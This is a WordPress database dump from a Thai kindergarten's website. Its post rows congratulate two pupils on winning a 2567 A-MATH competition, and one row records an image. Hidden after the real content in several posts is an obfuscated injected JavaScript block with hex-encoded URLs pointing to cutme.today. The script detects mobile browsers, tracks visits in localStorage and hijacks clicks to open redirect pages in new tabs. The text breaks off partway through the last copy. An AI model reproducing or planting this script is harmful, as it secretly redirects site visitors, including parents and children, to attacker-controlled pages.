(167,1,'2024-08-06 13:27:38','2024-08-06 06:27:38','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงกชพรรณ ชาตรูปไพศาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงศศินิภา ทองพิทักษ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจาปี 2567','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:27:38','2024-08-06 06:27:38','',158,'http://watprato.ssk.in.th/?p=167',0,'revision','',0),
(168,1,'2024-08-06 13:28:14','2024-08-06 06:28:14','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงกชพรรณ ชาตรูปไพศาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงศศินิภา ทองพิทักษ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจำปี 2567 โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง ✨ เด็กหญิงกชพรรณ ชาตรูปไพศาล เด็กหญิงศศินิภา ทองพิทักษ์ ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6 จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:28:14','2024-08-06 06:28:14','',158,'http://watprato.ssk.in.th/?p=168',0,'revision','',0),
(171,1,'2024-08-06 13:33:59','2024-08-06 06:33:59','','454010015_122167799234202781_6887725117770515048_n','','inherit','open','closed','','454010015_122167799234202781_6887725117770515048_n-2','','','2024-08-06 13:33:59','2024-08-06 06:33:59','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n-1.jpg',0,'attachment','image/jpeg',0),
(172,1,'2024-08-06 13:34:33','2024-08-06 06:34:33','<!-- wp:image {\"id\":171,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-171\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 